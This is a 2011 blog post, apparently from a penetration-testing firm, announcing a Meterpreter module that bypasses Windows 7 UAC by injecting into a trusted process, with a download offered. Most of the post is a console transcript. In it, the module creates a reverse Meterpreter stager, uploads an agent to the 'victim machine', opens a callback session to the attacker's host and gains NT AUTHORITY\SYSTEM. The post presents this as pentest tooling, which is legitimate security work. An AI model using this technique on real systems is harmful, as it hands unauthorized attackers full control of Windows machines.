January 01, 2011

Bypass Windows 7 x86/x64 UAC Fully Patched - Meterpreter Module

Written by David Kennedy
Penetration Testing, Security Testing & Analysis
Happy New Year everyone! Here is a nice new addition to bypass UAC through meterpreter. It all came about when Kevin Mitnick was on a pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post from Leo Davidson (http://www.pretentiousname.com/misc/win7_uac_whitelist2.html) on bypassing Windows UAC. This method takes advantage of process injection into a process that has a trusted Windows Publisher Certificate (for example, explorer.exe, which runs at medium integrity). This is fully functioning on both x86 and x64 platforms. Source code is in the zip along with the meterpreter plugin. You can download it here.

    [*] Sending stage (749056 bytes) to 172.16.32.130
    [*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1544) at Fri Dec 31 20:43:24 -0500 2010

    msf exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > getsystem
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > run bypassuac
    [*] Creating a reverse meterpreter stager: LHOST=172.16.32.128 LPORT=4546
    [*] Running payload handler
    [*] Uploading Windows UACBypass to victim machine.
    [*] Bypassing UAC Restrictions on the system....
    [*] Meterpreter stager executable 73802 bytes long
    [*] Uploaded the agent to the filesystem....
    [*] Executing the agent with endpoint 172.16.32.128:4546 with UACBypass in effect...
    meterpreter > [*] Meterpreter session 2 opened (172.16.32.128:4546 -> 172.16.32.130:1547) at Fri Dec 31 20:43:40 -0500 2010

    meterpreter > Background session 1? [y/N]
    msf exploit(handler) > sessions -i 2
    [*] Starting interaction with 2...

    meterpreter > getsystem
    ...got system (via technique 1).
    meterpreter > shell
    Process 416 created.
    Channel 1 created.
    Microsoft Windows [Version 6.1.7600]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami
    whoami
    nt authority\system

    C:\Windows\system32>